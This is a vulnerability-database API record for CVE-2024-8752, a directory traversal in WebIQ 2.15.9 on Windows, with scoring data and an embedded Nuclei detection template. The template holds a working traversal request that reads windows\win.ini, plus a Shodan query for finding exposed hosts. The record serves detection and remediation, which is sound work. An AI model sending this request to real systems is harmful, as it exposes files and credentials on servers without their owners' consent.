{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-8752/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-8752/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-8752/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-8752/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-8752/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-8752"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-8752"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.11759,
      "kev": false,
      "percentile": 0.95925
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-8752.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-8752\n\ninfo:\n  name: WebIQ 2.15.9 - Directory Traversal\n  author: s4e-io\n  severity: high\n  description: |\n    The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n  impact: |\n    Unauthenticated attackers can exploit directory traversal to read arbitrary files from the Windows system, potentially exposing sensitive configuration files, credentials, database files, and system information.\n  remediation: |\n    Update WebIQ to a version later than 2.15.9 to address the directory traversal vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2024-38\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-8752\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-8752\n    epss-score: 0.11759\n    epss-percentile: 0.95925\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: webiq\n    product: webiq\n    shodan-query: title:\"WebIQ\"\n  tags: cve,cve2024,webiq,lfi,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body,\"bit app support\",\"fonts]\",\"extensions]\")'\n          - 'contains(content_type,\"image/svg+xml\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502200705a37edcc552f04a77f8c0e4cfa5f73c63231d2ff934bb7961cb506a062662022100b6855f904e92357cd94a9b6255e4779d4bce0aa7719ac488db62008634f3d637:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-8752"
}